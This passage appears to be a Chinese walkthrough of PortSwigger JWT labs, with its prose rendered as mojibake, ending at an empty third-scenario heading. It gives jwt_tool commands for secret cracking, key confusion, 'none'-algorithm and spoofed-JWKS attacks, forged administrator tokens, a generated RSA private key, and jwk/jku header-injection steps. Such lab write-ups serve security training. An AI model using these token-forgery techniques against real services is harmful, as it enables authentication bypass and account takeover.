<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
#ÃüÁî¸ñÊ½ 
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt 
 
#Ö´ÐÐÊ¾Àý 
python3 jwt_tool.py eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw -C -d secrets.txt

</div>




¸½¼ÓÀ©Õ¹£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
#³¢ÊÔÆÆ½âÃÜÔ¿(HMACËã·¨) 
python3 jwt_tool.py JWT_HERE -C -d dictionary.txt 
 
#³¢ÊÔÊ¹ÓÃÒÑÖªµÄ¹«Ô¿¶Ô²»¶Ô³ÆÃÜÂë(RS-£¬EC-£¬PS-)½øÐÐ"ÃÜÔ¿»ìÏý"¹¥»÷ 
python3 jwt_tool.py JWT_HERE -K -pk my_public.pem 
 
#³¢ÊÔÊ¹ÓÃ"ÎÞ"Ëã·¨À´´´½¨Î´ÑéÖ¤µÄÁîÅÆ 
python3 jwt_tool.py JWT_HERE -A 
 
#´¦ÀíJSON WebÃÜÔ¿´æ´¢ÎÄ¼þ£¬ÖØ½¨¹«¹²ÃÜÔ¿£¬È»ºó²âÊÔÃÜÔ¿ÒÔ²é¿´ÑéÖ¤ÁîÅÆµÄÃÜÔ¿ 
python3 jwt_tool.py JWT_HERE -J -jw jwks.json 
 
#Éú³ÉÒ»¸öÐÂµÄRSAÃÜÔ¿¶Ô£¬½«¹«Ô¿×÷ÎªJSON WebÃÜÔ¿´æ´¢¶ÔÏó×¢ÈëÁîÅÆ²¢Ê¹ÓÃË½Ô¿¶ÔÁîÅÆÇ©Ãû 
python3 jwt_tool.py JWT_HERE -I 
 
#ÆÛÆÔ¶³ÌJWKS£ºÉú³ÉÐÂµÄRSAÃÜÔ¿¶Ô£¬½«Ìá¹©µÄURL×¢ÈëÁîÅÆ£¬½«¹«¹²ÃÜÔ¿µ¼³öÎªJSON WebÃÜÔ¿´æ´¢¶ÔÏó(ÒÔÌá¹©µÄURL½øÐÐ·þÎñ)²¢Ê¹ÓÃË½Ô¿¶ÔÁîÅÆÇ©Ãû 
python3 jwt_tool.py JWT_HERE -S -u http://example.com/jwks.json

</div>

Step 5£ºËæºóÔÚÍøÒ³¶ËÖØÐÂÉèÖÃÃÜÔ¿(secret1)²¢ÖØÐÂ²úÉúµÄ×Ö·û´® 
Header£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9 
{"kid":"ccf8b97a-94fe-4c7d-9b61-276f0654c2eb","alg":"HS256"}

</div>




payload(Ç°)£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5OTk1OX0 
{"iss":"portswigger","sub":"wiener","exp":1687799959}

</div>




payload(ÐÂ)£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{"iss":"portswigger","sub":"administrator","exp":1687799959} 
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9

</div>




Signer:

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0

</div>




×îÖÕ¸ßÈ¨ÏÞµÄJWT tokenÈçÏÂ£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
eyJraWQiOiJjY2Y4Yjk3YS05NGZlLTRjN2QtOWI2MS0yNzZmMDY1NGMyZWIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTk5NTl9.E891AutpjiwkhVUDV2dZdrfGzsv5TweyIUUhT_a1Ar0

</div>




Step 6£º·ÃÎÊ/adminÂ·¾¶





Step 7£ºµ÷ÓÃ½Ó¿ÚÉ¾³ýÓÃ»§Íê³É½â´ð








JWTÍ·²¿×¢Èë


³¡¾°½éÉÜ


Èç¹û·þÎñÆ÷¶ËÊ¹ÓÃÒ»¸ö·Ç³£´àÈõµÄÃÜÔ¿£¬ÎÒÃÇÉõÖÁÓÐ¿ÉÄÜÒ»¸ö×Ö·ûÒ»¸ö×Ö·ûµØÀ´±©Á¦ÆÆ½âÕâ¸öÃÜÔ¿£¬¸ù¾ÝJWS¹æ·¶Ö»ÓÐalg±¨Í·²ÎÊýÊÇÇ¿ÖÆµÄ£¬È»¶øÔÚÊµ¼ùÖÐJWT±¨Í·Í¨³£°üº¬¼¸¸öÆäËû²ÎÊý£¬ÒÔÏÂÊÇ¹¥»÷ÕßÌØ±ð¸ÐÐËÈ¤µÄ£º

<ul style="margin-top:0cm;" type="disc">
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
jwk(JSON Web Key)£ºÌá¹©Ò»¸ö´ú±íÃÜÔ¿µÄÇ¶ÈëÊ½JSON¶ÔÏó
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
jku(JSON Web Key Set URL)£ºÌá¹©Ò»¸öURL£¬·þÎñÆ÷¿ÉÒÔ´ÓÕâ¸öURL»ñÈ¡Ò»×é°üº¬ÕýÈ·ÃÜÔ¿µÄÃÜÔ¿
</li>
<li style="background:white;color:#333333;font-family:µÈÏß;font-size:10.5pt;line-height:19.5pt;margin:0cm;tab-stops:list 36.0pt;text-align:justify;text-justify:inter-ideograph;">
kid(ÃÜÔ¿id)£ºÌá¹©Ò»¸öID£¬ÔÚÓÐ¶à¸öÃÜÔ¿¿É¹©Ñ¡ÔñµÄÇé¿öÏÂ·þÎñÆ÷¿ÉÒÔÓÃËüÀ´Ê¶±ðÕýÈ·µÄÃÜÔ¿£¬¸ù¾Ý¼üµÄ¸ñÊ½Õâ¿ÉÄÜÓÐÒ»¸öÆ¥ÅäµÄkid²ÎÊý
</li>
</ul>

ÕâÐ©ÓÃ»§¿É¿ØÖÆµÄ²ÎÊýÃ¿¸ö¶¼¸æËß½ÓÊÕ·½·þÎñÆ÷ÔÚÑéÖ¤Ç©ÃûÊ±Ó¦¸ÃÊ¹ÓÃÄÄ¸öÃÜÔ¿£¬ÏÂÃæÎÒÃÇ½«½éÉÜÈçºÎÀûÓÃÕâÐ©²ÎÊýÀ´×¢ÈëÊ¹ÓÃÄú×Ô¼ºµÄÈÎÒâÃÜÔ¿¶ø²»ÊÇ·þÎñÆ÷µÄÃÜÔ¿Ç©ÃûÐÞ¸Ä¹ýµÄJWT


×¢Èë³¡¾°1


ÏÂÃæÎÒÃÇ½éÉÜÈçºÎÍ¨¹ýJWK²ÎÊý×¢Èë×ÔÇ©ÃûµÄJWT£¬JWS(JSON Web Signature)¹æ·¶ÃèÊöÁËÒ»¸ö¿ÉÑ¡µÄjwk header²ÎÊý£¬·þÎñÆ÷¿ÉÒÔÊ¹ÓÃ¸Ã²ÎÊýÒÔjwk¸ñÊ½½«Æä¹«Ô¿Ö±½ÓÇ¶ÈëÁîÅÆ±¾Éí£¬Äú¿ÉÒÔÔÚÏÂÃæµÄJWT headÖÐ¿´µ½¾ßÌåµÄÊ¾Àý:

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG", 
    "typ": "JWT", 
    "alg": "RS256", 
    "jwk": { 
        "kty": "RSA", 
        "e": "AQAB", 
        "kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG", 
        "n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m" 
    } 
}

</div>

ÀíÏëÇé¿öÏÂ·þÎñÆ÷Ó¦¸ÃÖ»Ê¹ÓÃÓÐÏÞµÄ¹«Ô¿°×Ãûµ¥À´ÑéÖ¤JWTÇ©Ãû£¬È»¶ø´íÎóÅäÖÃµÄ·þÎñÆ÷ÓÐÊ±»áÊ¹ÓÃjwk²ÎÊýÖÐÇ¶ÈëµÄ¼üÖµ£¬Äú¿ÉÒÔÍ¨¹ýÊ¹ÓÃ×Ô¼ºµÄRSAË½Ô¿¶ÔÐÞ¸ÄºóµÄJWT½øÐÐÇ©Ãû£¬È»ºóÔÚjwkÍ·ÖÐÇ¶ÈëÆ¥ÅäµÄ¹«Ô¿À´ÀûÓÃÕâÖÖÐÐÎª£¬BurpsuiteµÄJWT EditorÀ©Õ¹Ìá¹©ÁËÒ»¸öÓÐÓÃµÄ¹¦ÄÜÀ´°ïÖúÄú²âÊÔ´ËÂ©¶´£¬Äú¿ÉÒÔÔÚBurpÖÐÊÖ¶¯Ìí¼Ó»òÐÞ¸ÄJWT²ÎÊý 
°Ð³¡µØÖ·£ºhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection





Step 1£ºµã»÷"ACCESS THE LAB"·ÃÎÊ°Ð³¡





Step 3£ºµã»÷"My Account"µÇÂ¼ÏµÍ³

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
wiener:peter

</div>




Step 4£ºµÇÂ¼Ö®ºó¿ÉÒÔ¿´µ½ÈçÏÂÓÊÏä¸üÐÂ½çÃæ





Step 5£ºÏÂÃæÎÒÃÇ¿ªÊ¼²Ù×÷£¬²»¹ýÔÚ´ËÖ®Ç°ÎÒÃÇµÃÏÈÎäÆ÷»¯ÒÔÏÂ×Ô¼º£¬ÔÚBurpsuite½çÃæÑ¡Ôñ"Extender"Ñ¡Ïî¿¨£¬½ô½Ó×Åµã»÷"BApp Store"°²×°"JWT Editor"





Ö®ºóÄã¿ÉÒÔ¿´µ½ÈçÏÂµÄÑ¡Ïî¿¨½çÃæ





Step 6£ºÉú³ÉÒ»¸öÐÂµÄRSAÃÜÔ¿

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "p": "8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU", 
    "kty": "RSA", 
    "q": "1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8", 
    "d": "Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ", 
    "e": "AQAB", 
    "kid": "fa018615-0392-4d15-89bb-a2c637d9adbd", 
    "qi": "XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks", 
    "dp": "0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0", 
    "dq": "QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M", 
    "n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w" 
}

</div>




Step 7£ºË¢ÐÂÒ³ÃæÀ¹½Øµ½ÇëÇó²¢½«ÇëÇó·¢ËÍµ½RepeatÄ£¿é





Step 8£ºÔÚRepeatÄ£¿é£¬ÎÒÃÇÇÐ»»µ½JSON Web TokenÑ¡Ïî¿¨£¬ÐÞ¸ÄJWTµÄÓÐÐ§¸ºÔØ½«subÄÚÈÝÐÞ¸ÄÎªadministrator








Step 9£ºµã»÷"Attack"£¬È»ºóÑ¡Ôñ"Embedded JWK"£¬³öÏÖÌáÊ¾Ê±Ñ¡ÔñÄúÐÂÉú³ÉµÄRSAÃÜÔ¿








Step 10£ºÖ®ºó³É¹¦Ô½È¨





Step 11£ºµ÷ÓÃÃô¸Ð²Ù×÷½Ó¿ÚÉ¾³ýcarlosÓÃ»§Íê³É½âÌâ





 





 


×¢Èë³¡¾°2


ÓÐÐ©·þÎñÆ÷¿ÉÒÔÊ¹ÓÃjku(jwk Set URL)Í·²ÎÊýÀ´ÒýÓÃ°üº¬ÃÜÔ¿µÄJWK¼¯£¬¶ø²»ÊÇÖ±½ÓÊ¹ÓÃJWKÍ·²ÎÊýÀ´Ç¶Èë¹«Ô¿£¬µ±ÑéÖ¤Ç©ÃûÊ±£¬·þÎñÆ÷´ÓÕâ¸öURL»ñÈ¡Ïà¹ØµÄÃÜÔ¿£¬ÕâÀïµÄJWK¼¯ÆäÊµÊÇÒ»¸öJSON¶ÔÏó£¬°üº¬Ò»¸ö´ú±í²»Í¬¼üµÄJWKÊý×é£¬ÏÂÃæÊÇÒ»¸ö¼òµ¥µÄÀý×Ó£º

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "keys": [ 
        { 
            "kty": "RSA", 
            "e": "AQAB", 
            "kid": "75d0ef47-af89-47a9-9061-7c02a610d5ab", 
            "n": "o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ" 
        }, 
        { 
            "kty": "RSA", 
            "e": "AQAB", 
            "kid": "d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA", 
            "n": "fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw" 
        } 
    ] 
}

</div>

JWK¼¯ºÏÓÐÊ±»áÍ¨¹ýÒ»¸ö±ê×¼¶Ëµã¹«¿ª£¬±ÈÈç:/.well-known/jwks.json£¬¸ü°²È«µÄÍøÕ¾Ö»»á´ÓÊÜÐÅÈÎµÄÓò»ñÈ¡ÃÜÔ¿£¬µ«ÓÐÊ±Äú¿ÉÒÔÀûÓÃURL½âÎö²îÒìÀ´ÈÆ¹ýÕâÖÖ¹ýÂË£¬ÏÂÃæÎÒÃÇÍ¨¹ýÒ»¸ö°Ð³¡À´Êµ¼ùÒÔÏÂ 
°Ð³¡µØÖ·£ºhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection





 
Step 1£ºÊ×ÏÈµã»÷ÉÏ·½µÄ"ACCESS THE LAB"Ñ¡Ïî¿¨½øÈëÊµÑé»·¾³





Step 2£ºµÇÂ¼ÏµÍ³

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
wiener:peter

</div>




Step 3£ºËæºóÄã»á¿´µ½Ò»¸öÓÃ»§ÓÊÏä¸üÐÂµÄ±íµ¥





Step 4£ºÊ¹ÓÃburpsuiteÉú³ÉÒ»¸öÐÂµÄRSAÃÜÔ¿

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "p": "8J0fgpxQpZOvPGb2rRsJB6Bh0lgvxRtp_Ilc7NmpI3UgEUiArSey091pT3X6lIPRZLdMf_eeYo_PWh5aq79Ps_xoZHtAz4VrR9sR8tCkND-z0KKBmopkUrowJie368xoWDU53P-4qxEfCfqPPxoZZRzhE7cse0PUVayNAJC01FU", 
    "kty": "RSA", 
    "q": "1zMkdJNLYEdZYvZ31B15CmCfI9dOGEpn6lyXOEBPsqrP554x_8dXZnXSHbybiYyeLgl6i_JubJBqjeSAejwHh9v-e3-R9-7Dgg4lB_OUNqsg7yM3mcpZn7IHeGVKj9BjhigWsbUXFuwM1iEDK4TDmTV4-tO9UMsIBQA1SFlUTA8", 
    "d": "Ayw2AASn_yn6EwjqCts6_gP6NZ9BlNhCG1iuDTX9h_AGWYBtUepdgp4CaM098ZyjH2Da3RvonFVlTOwHTgVAdkb2eWqeMejMjUji3cKIQRU_r0UeY3C4q8BBuWjwzF7ZTeVDgbx05NfeUW0LwWE3mFBuPDy6tmvYdekcs8Ft7GDmU_ToPZaGnMoEKzVlMyDb82LgkB7qWw2H4UoXHWR0l_RS90gTjkJzMc4Fmu4CoPfmqw8jLnGgq8GhAzpecc-VLvqel3tSY0fKqF5Y3U2SooL27vJJxX0kLgHVbcTNvCcS8XZArdhWTekV923jtspoNDYn5HfhAlLglCcwQcOSYQ", 
    "e": "AQAB", 
    "kid": "fa018615-0392-4d15-89bb-a2c637d9adbd", 
    "qi": "XO3HEFj8PCxFz4DIw0djHjTrW4Krm-Oim-U4bmuEdmPDKKTIYYvkPVoSRR-4kCHkCx2aDsraUbNkTyEYC4dRUbnWl6xr2HxaLZIsxOglYsa939l_m6NXSzttAGrPpWqoURT7t6ihSmBnGDJDsMS3c1gWJKZsAYkeXy5lI2IhGks", 
    "dp": "0gfldIZsY0w5_9jE5LAfvreCDDGMaVsXtihVpC4PVXMs7clDAWMQ152DCqiqdi9mfar_LQkCCXkM_9ZVQWw675qZqXRpS3xj_BI_ZZw4aZ9dn_XqefLpxcjetL-g7US9pJm5i67xDOpiFLzRg7yNhFSkKCiRvHumAq8fWen23w0", 
    "dq": "QcZI6zSmAjxsjrnkcDm96DUWDv9cyEHdtx0rvy6w7VwWBaYthA8qoI98dEhUhdsr8chF44Zqx9XwK4Re3H2Ck7zi8F5SgCRDL3ohSWfisj7l5xGtidz2PcBNVjgnbQN1l-ii3xgJgaEOX1hhvqhqnGZins-e-pXD0rt4ja93-3M", 
    "n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w" 
}

</div>




Step 5£º·¢ËÍÇëÇóµ½repeat





Step 6£º¸´ÖÆ¹«Ô¿×÷ÎªJWK

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
    "kty": "RSA", 
    "e": "AQAB", 
    "kid": "fa018615-0392-4d15-89bb-a2c637d9adbd", 
    "n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w" 
}

</div>




Step 7£ºÔÚÌâÄ¿ÖÐÑ¡Ôñ"Go eo exploit server"£¬È»ºó¼ÓÉÏkeyÍ·²¢±£´æµ½exploitµÄbodyÖÐ

<div style="background:#F7F7F7;border:solid windowtext 1.0pt;padding:12.0pt 12.0pt 12.0pt 12.0pt;">
<p style="background:#F7F7F7;border:none;font-family:µÈÏß;font-size:10.5pt;margin:0cm;padding:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:justify;text-justify:inter-ideograph;">
{ 
   "keys": [ 
       { 
           "kty": "RSA", 
           "e": "AQAB", 
           "kid": "fa018615-0392-4d15-89bb-a2c637d9adbd", 
           "n": "ykQHB6Jelehm2eVfkb-2mSTpfODsGlthhS0sTLX5geGwsQCz4gnRbXPN5gOsCpqUbJH9gDE80q262XuS8DNrdmTLTPjuM4wRc-ghh9GvOCgJGBtO1PIVCTIsPmwhMra0eykwj246GReyoDcUhreG2yZ8rg-tHIcxPyWBtdKY2tubM6-YLk5gVLcuHRL25Fn_I5NghQbyzmISbulJ1CMq5WU-h9RA8IkYhVcrsP8Y1E2dc4fagKn5Tp60bUkjCcqIMAKouI-CX86mF0k3cSd340KuUXuf2vIo_yWMhZjFkAxj-gBn4eO3l2qZgyGkkHMn0HL8RSDzdG-BSBgNYoWs-w" 
     } 
    ] 
}

</div>







Step 8£ºÈ»ºóÇÐ»»ÖÁrepeatµÄ"JSON Web Token"½çÃæ£¬½«kidÐÞ¸Ä³É×Ô¼ºÉú³ÉµÄJWKÖÐµÄkidÖµ£¬½«jkuµÄÖµ¸ÄÎªexploit








Step 9£ºÇÐ»»subÎªadministrator





Step 10£ºµã»÷ÏÂÃæµÄsign£¬Ñ¡ÔñDon¡¯t modify headerÄ£Ê½





Step 11£º¸ü¸ÄÇëÇóÂ·¾¶·¢ËÍÇëÇó³É¹¦Ô½È¨





Step 12£ºÇëÇóÃô¸ÐÂ·¾¶É¾³ýcarlosÓÃ»§





Step 13£º³É¹¦½âÌâ





# ×¢Èë³¡¾°3


